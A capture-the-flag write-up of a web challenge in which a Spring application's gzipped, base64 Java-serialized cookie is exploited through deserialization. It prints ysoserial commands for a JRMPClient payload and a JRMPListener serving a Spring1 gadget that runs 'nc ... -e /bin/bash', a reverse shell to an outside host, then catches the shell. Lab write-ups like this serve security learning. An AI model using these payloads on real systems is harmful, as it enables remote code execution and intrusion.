Too Many Credits 2 [web]

Too Many Credits 2

Even if you could get the first flag, I bet you can't pop a shell!


Same server as "Too many credits 1".w

We get a cookie with base64 -> gzip -> java serialized data. Possible RCE.


  • Analyze "normal" serialized data in cookie
  • Enumerate technologies used (maybe spring/springboot?)
  • Springframework is in use, no specific version identified


Server responds to any URI with the main routine, e.g:

  • /klsajlfksdjfljdslak results in the main page being shown.
  • /favicon.ico actually results in an icon.

Trying a different method to see what happens:

$ curl -X DELETE ''
    "error": "Method Not Allowed",
    "exception": "org.springframework.web.HttpRequestMethodNotSupportedException",
    "message": "Request method 'DELETE' not supported",
    "path": "/",
    "status": 405,
    "timestamp": 1584723698736

Given that, we know that at least the package org.springframework.web is loaded in the classpath of some classloader. We'd have to see if we can find gadgets in either spring-web itself or any of its dependencies, along with the usual suspects, e.g. Apache commons.

Available ysoserial gadgets

JRMPClient payload seems to work. We need a server that's listening on JRMP connections, we can use ysoserial's listener for that and deliver a payload that'd hopefully do the job, payloads tested:

Payload generation with JRMPClient

$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient 'redacted:2020' | gzip - | base64 | tr -d '\n'

Set up a JRMPListener on the server on port 2020, and a listener for a shell on port 2025:

~/ysoserial# java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 2020 Spring1 'nc redacted 2025 -e /bin/bash'
* Opening JRMP listener on 2020

We make a HTTP connection with our payload as cookie and get a connection back:

misc:~# nc -lvp 2025
listening on [any] 2025 ...
connect to [] from [] 43713
cat flag
cat flag.txt